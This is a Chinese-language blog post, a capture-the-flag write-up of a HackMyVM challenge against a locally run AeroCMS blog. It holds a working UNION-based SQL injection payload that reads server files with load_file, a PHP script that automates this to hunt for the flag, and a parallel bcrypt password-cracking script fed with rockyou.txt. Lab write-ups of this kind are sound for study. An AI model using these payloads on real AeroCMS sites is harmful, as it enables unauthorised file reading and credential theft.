<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"ghostlitao.gitee.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="题目就一句话： Instructions in README.md inside the file.然后给了个下载链接，下载下来是一个压缩包，解压后是源码、Dockerfile、README.md等文件。 先看 README 中几个地方比较关键：  这是一个开源的 Blog 系统，代码地址 https:&#x2F;&#x2F;github.com&#x2F;MegaTKC&#x2F;AeroCMS 有个字段动启动脚本： .&#x2F;build_">
<meta property="og:type" content="article">
<meta property="og:title" content="复盘HackMyVM challenges docker 059">
<meta property="og:url" content="https://ghostlitao.gitee.io/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/index.html">
<meta property="og:site_name" content="去找Todd">
<meta property="og:description" content="题目就一句话： Instructions in README.md inside the file.然后给了个下载链接，下载下来是一个压缩包，解压后是源码、Dockerfile、README.md等文件。 先看 README 中几个地方比较关键：  这是一个开源的 Blog 系统，代码地址 https:&#x2F;&#x2F;github.com&#x2F;MegaTKC&#x2F;AeroCMS 有个字段动启动脚本： .&#x2F;build_">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2024-02-04T05:16:13.000Z">
<meta property="article:modified_time" content="2024-04-09T00:36:30.853Z">
<meta property="article:author" content="Todd">
<meta property="article:tag" content="安全 靶场">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://ghostlitao.gitee.io/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>复盘HackMyVM challenges docker 059 | 去找Todd</title>
  


  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?d988341c748563d16048e8e7dab0f384";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">去找Todd</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Todd的博客</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          复盘HackMyVM challenges docker 059
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-04 13:16:13" itemprop="dateCreated datePublished" datetime="2024-02-04T13:16:13+08:00">2024-02-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:36:30" itemprop="dateModified" datetime="2024-04-09T08:36:30+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>题目就一句话： Instructions in README.md inside the file.<br>然后给了个下载链接，下载下来是一个压缩包，解压后是源码、Dockerfile、README.md等文件。</p>
<p>先看 README 中几个地方比较关键：</p>
<ol>
<li>这是一个开源的 Blog 系统，代码地址 <a target="_blank" rel="noopener" href="https://github.com/MegaTKC/AeroCMS">https://github.com/MegaTKC/AeroCMS</a></li>
<li>有个字段动启动脚本： <code>./build_docker.sh</code> 里面其实就是：<ol>
<li><code>docker build -t h1ker .</code></li>
<li><code>docker run --name=h1ker -d -p 1337:80 h1ker</code></li>
</ol>
</li>
<li>最后如何清理。</li>
</ol>
<p>执行 <code>./build_docker.sh</code> 后，访问 <code>http://localhost:1337/</code> 就能看到一个博客系统了。</p>
<span id="more"></span>

<p>先看了登陆入口，没有明显的问题，放弃了登陆入口的注入尝试。<br>login.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$username</span> = <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$connection</span>, <span class="title function_ invoke__">trim</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;username&#x27;</span>]));</span><br><span class="line"><span class="variable">$password</span> = <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$connection</span>, <span class="title function_ invoke__">trim</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;password&#x27;</span>]));</span><br><span class="line"></span><br><span class="line"><span class="variable">$query</span> = <span class="string">&quot;SELECT * FROM users WHERE username = &#x27;<span class="subst">$username</span>&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$connection</span>, <span class="variable">$query</span>);</span><br><span class="line">....</span><br><span class="line"><span class="keyword">if</span>(<span class="title function_ invoke__">password_verify</span>(<span class="variable">$password</span>, <span class="variable">$db_password</span>))</span><br><span class="line">&#123;</span><br><span class="line">.....</span><br><span class="line">    <span class="title function_ invoke__">header</span>(<span class="string">&quot;Location: ../admin/index.php&quot;</span>);</span><br></pre></td></tr></table></figure>


<p>看了下 源码 search.php </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$query</span> = <span class="string">&quot;SELECT * FROM posts WHERE post_tags LIKE &#x27;%<span class="subst">$search</span>%&#x27;&quot;</span>;</span><br><span class="line"><span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$connection</span>, <span class="variable">$query</span>);</span><br></pre></td></tr></table></figure>
<p>有明显的注入点，直接 sqlmap 跑了一下，<code>users</code>中有 admin 和密码，<code>$2a$12$M8KMzrASFLbF.tEyC5bGRebyfk/.wyQn0yt39GbZi8TfixfgKo9Zm</code>,拿出去 cmd5 了一下，没有。<br>自己搞了个脚本跑爆破：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">ini_set</span>(<span class="string">&#x27;memory_limit&#x27;</span>, <span class="string">&#x27;-1&#x27;</span>);</span><br><span class="line"><span class="variable">$target</span> = <span class="string">&#x27;$2a$12$M8KMzrASFLbF.tEyC5bGRebyfk/.wyQn0yt39GbZi8TfixfgKo9Zm&#x27;</span>;</span><br><span class="line"><span class="variable">$rock_you_list</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="string">&quot;rockyou.txt&quot;</span>);</span><br><span class="line"><span class="variable">$rock_you_list</span> = <span class="title function_ invoke__">explode</span>(<span class="string">&quot;\n&quot;</span>, <span class="variable">$rock_you_list</span>);</span><br><span class="line"><span class="variable">$length</span> = <span class="title function_ invoke__">count</span>(<span class="variable">$rock_you_list</span>);</span><br><span class="line"><span class="variable">$processCount</span> = <span class="number">8</span>; <span class="comment">// 调整进程数量</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$chunkSize</span> = <span class="title function_ invoke__">ceil</span>(<span class="variable">$length</span> / <span class="variable">$processCount</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="variable">$i</span> = <span class="number">0</span>; <span class="variable">$i</span> &lt; <span class="variable">$processCount</span>; <span class="variable">$i</span>++) &#123;</span><br><span class="line">    <span class="variable">$pid</span> = <span class="title function_ invoke__">pcntl_fork</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$pid</span> == -<span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;无法创建子进程&quot;</span>);</span><br><span class="line">    &#125; <span class="keyword">elseif</span> (<span class="variable">$pid</span>) &#123;</span><br><span class="line">        <span class="comment">// 父进程</span></span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// 子进程</span></span><br><span class="line">        <span class="variable">$start</span> = <span class="variable">$i</span> * <span class="variable">$chunkSize</span>;</span><br><span class="line">        <span class="variable">$end</span> = <span class="title function_ invoke__">min</span>((<span class="variable">$i</span> + <span class="number">1</span>) * <span class="variable">$chunkSize</span>, <span class="variable">$length</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> (<span class="variable">$j</span> = <span class="variable">$start</span>; <span class="variable">$j</span> &lt; <span class="variable">$end</span>; <span class="variable">$j</span>++) &#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="variable">$i</span>==<span class="number">0</span>)&#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="title function_ invoke__">sprintf</span>(<span class="string">&quot;进度: <span class="subst">$j</span> / <span class="subst">$end</span>\r&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">password_verify</span>(<span class="variable">$rock_you_list</span>[<span class="variable">$j</span>], <span class="variable">$target</span>)) &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;找到密码: &quot;</span> . <span class="variable">$rock_you_list</span>[<span class="variable">$j</span>] . PHP_EOL;</span><br><span class="line">                <span class="keyword">exit</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        </span><br><span class="line">        </span><br><span class="line">        <span class="comment">// 子进程完成后退出</span></span><br><span class="line">        <span class="keyword">exit</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 父进程等待所有子进程完成</span></span><br><span class="line"><span class="keyword">while</span> (<span class="title function_ invoke__">pcntl_waitpid</span>(<span class="number">0</span>, <span class="variable">$status</span>) != -<span class="number">1</span>) &#123;</span><br><span class="line">    <span class="variable">$status</span> = <span class="title function_ invoke__">pcntl_wexitstatus</span>(<span class="variable">$status</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;子进程 <span class="subst">$status</span> 完成&quot;</span> . PHP_EOL;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;未找到密码。&quot;</span> . PHP_EOL;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>翻了翻这个密码的生成规则：在edit_user.php中</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$password</span> = <span class="title function_ invoke__">password_hash</span>(<span class="variable">$password</span>, PASSWORD_BCRYPT, <span class="keyword">array</span>(<span class="string">&#x27;cost&#x27;</span> =&gt; <span class="number">12</span>));</span><br></pre></td></tr></table></figure>
<p>果然用了 password_hash&#x2F;password_verify，爆破不是一个简单的事儿。rockyou.txt 我这个 M1，需要大概 800+小时。<br>不过发现了一个工具： <a target="_blank" rel="noopener" href="https://hashcat.net/hashcat/">https://hashcat.net/hashcat/</a> ，可以用 GPU 加速爆破，不过我这个笔记本还没有兼容，就放弃尝试了。</p>
<p>想了想，这个题目应该不是让我们爆破密码的，打开<a target="_blank" rel="noopener" href="https://www.exploit-db.com/">https://www.exploit-db.com/</a> 搜了下 Aero CMS，3 个漏洞，两个 SQL 注入，一个 PHP Code Injection，其实看了 edit_user.php 中，还有一个文件上传漏洞，不过edit_user.php必须管理员登陆，所以这个漏洞暂时不可用。</p>
<p>最后还是回到 SQL 注入上，SQL 注入后，看看能不能写个 webshell，然后发现没权限，</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">show</span> variables <span class="keyword">like</span> &quot;%secure_file_priv%&quot;;</span><br></pre></td></tr></table></figure>
<p>结果是空字符串，可以读取文件，但是&#x2F;var&#x2F;www&#x2F;html 没权限不能写文件。<br>既然这样，那么就直接读取 flag 文件吧。</p>
<p>hackbar中试出可用的payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost:1337/author_posts.php?author=admin1&#x27; UNION ALL SELECT 1,2,load_file(&quot;/var/www/html/admin/index.php&quot;),4,5,6,7,8,9,10,11,12-- -&amp;p_id=1</span><br></pre></td></tr></table></figure>

<p>先看下项目 admin 下有多少文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">find  ./admin  -<span class="built_in">type</span> f -name <span class="string">&quot;*.php&quot;</span></span><br><span class="line"></span><br><span class="line">./admin/functions.php</span><br><span class="line">./admin/post_comments.php</span><br><span class="line">./admin/index.php</span><br><span class="line">./admin/comments.php</span><br><span class="line">./admin/includes/view_all_comments.php</span><br><span class="line">./admin/includes/add_user.php</span><br><span class="line">./admin/includes/edit_user.php</span><br><span class="line">./admin/includes/update_categories.php</span><br><span class="line">./admin/includes/edit_post.php</span><br><span class="line">./admin/includes/add_post.php</span><br><span class="line">./admin/includes/view_all_posts.php</span><br><span class="line">./admin/includes/header.php</span><br><span class="line">./admin/includes/footer.php</span><br><span class="line">./admin/includes/delete_modal.php</span><br><span class="line">./admin/includes/view_all_users.php</span><br><span class="line">./admin/includes/navigation.php</span><br><span class="line">./admin/users.php</span><br><span class="line">./admin/profile.php</span><br><span class="line">./admin/categories.php</span><br><span class="line">./admin/posts.php</span><br></pre></td></tr></table></figure>
<p>不算多，写个 PHP 脚本，读取所有文件内容，然后 grep flag。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$directory</span> = <span class="string">&#x27;./admin&#x27;</span>;</span><br><span class="line"><span class="variable">$iterator</span> = <span class="keyword">new</span> <span class="built_in">RecursiveIteratorIterator</span>(<span class="keyword">new</span> <span class="built_in">RecursiveDirectoryIterator</span>(<span class="variable">$directory</span>));</span><br><span class="line"><span class="variable">$phpFiles</span> = [];</span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$iterator</span> <span class="keyword">as</span> <span class="variable">$file</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$file</span>-&gt;<span class="title function_ invoke__">isFile</span>() &amp;&amp; <span class="variable">$file</span>-&gt;<span class="title function_ invoke__">getExtension</span>() === <span class="string">&#x27;php&#x27;</span>) &#123;</span><br><span class="line">        <span class="variable">$phpFiles</span>[] = <span class="variable">$file</span>-&gt;<span class="title function_ invoke__">getPathname</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$phpFiles</span> <span class="keyword">as</span> <span class="variable">$phpFile</span>) &#123;</span><br><span class="line">    <span class="variable">$relativePath</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$phpFile</span>, <span class="title function_ invoke__">strlen</span>(<span class="variable">$directory</span>) + <span class="number">1</span>);</span><br><span class="line">    <span class="variable">$url</span> = <span class="string">&quot;http://localhost:1337/author_posts.php?author=admin1%27%20UNION%20ALL%20SELECT%201,2,load_file(%22/var/www/html/admin/<span class="subst">$relativePath</span>%22),4,5,6,7,8,9,10,11,12--%20-&amp;p_id=1&quot;</span>;</span><br><span class="line">    <span class="variable">$result</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$url</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">strpos</span>(<span class="variable">$result</span>, <span class="string">&#x27;HMV&#x27;</span>) !== <span class="literal">false</span>) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Found &#x27;HMV&#x27; in <span class="subst">$phpFile</span>:\n&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$result</span>\n&quot;</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;------------------------\n&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php crack2.php</span><br><span class="line">Found <span class="string">&#x27;HMV&#x27;</span> <span class="keyword">in</span> ./admin/categories.php:</span><br></pre></td></tr></table></figure>
<p>后边就能看到 flag 了。</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AE%89%E5%85%A8-%E9%9D%B6%E5%9C%BA/" rel="tag"># 安全 靶场</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/06/02/%E6%95%B4%E7%90%86%E5%B7%A5%E4%BD%9C%E4%B8%AD%E5%8F%AF%E8%83%BD%E7%94%A8%E5%88%B0%E7%9A%84-ai-%E5%B7%A5%E5%85%B7/" rel="prev" title="整理工作中可能用到的 ai 工具">
      <i class="fa fa-chevron-left"></i> 整理工作中可能用到的 ai 工具
    </a></div>
      <div class="post-nav-item">
    <a href="/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/" rel="next" title="复盘HMVLabs Chapter 1: Venus">
      复盘HMVLabs Chapter 1: Venus <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Todd"
      src="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
  <p class="site-author-name" itemprop="name">Todd</p>
  <div class="site-description" itemprop="description">把生命浪费在美好的实物上</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ghostlitao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ghostlitao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Todd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
